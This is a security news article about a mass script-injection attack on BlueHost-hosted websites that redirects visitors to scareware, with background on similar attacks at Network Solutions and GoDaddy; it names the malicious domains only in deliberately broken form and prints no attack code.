14 DAY TRIAL // Security researchers from web integrity monitoring services provider Sucuri warn that a new mass injection attack is targeting websites hosted at BlueHost. The company's own CEO, Matt Heaton, appears to be amongst the victims of this attack, having his blog compromised and left spreading rogueware.
The rogue code being added to the bottom of every page on compromised websites is encoded in base64, to make it harder to spot. Unobfuscated, the code is a <script> element which points to http:// domainameat. cc/js2 .php [URL intentionally broken].
A directory of .html files called ".files" is also being created in the root folder of each compromised blog. Judging by their names, these pages are most likely used for black hat search engine optimization (BHSEO).
The script on domainameat.cc, which was registered on Friday, sets cookies to track visitors and redirects them to a scareware distribution page hosted on workfree23.net [don't visit]. The cybercrooks running this FAKEAV taunt the researchers at ESET, the company developing NOD32 antivirus. According to a jsunpack analysis of the page, one of the div elements has an id of "hello_nod32_guys_how_u_doing".
"This attack seems very similar to the one that affected GoDaddy in the recent past," Sucuri researcher David Dede, observes. The company, which runs a scanner that checks websites for malicious code, wrote a script to help webmasters clean up the affected websites. The script needs its extension changed to .php before being executed on the server.
As Mr. Dede already pointed out, a series of similar mass injection attacks have targeted various webhosting providers this year. In April, a large number of WordPress-based blogs hosted at Network Solutions had a rogue Iframe injected into them. The security hole was subsequently determined to be improper file permissions.
Two weeks later, another wave of attacks left thousands of websites at the same hosting company compromised with malicious code. This time the injection was not limited only to WordPress blogs and also affected sites built on CMS platforms like Joomla!, as well as plain HTML ones.
Users are advised to always browse the Web with a capable and up to date antivirus solution installed on their computer. Firefox users can also use the NoScript extension to block third-party scripts loaded from external domains by default.
You can follow the editor on Twitter @lconstantin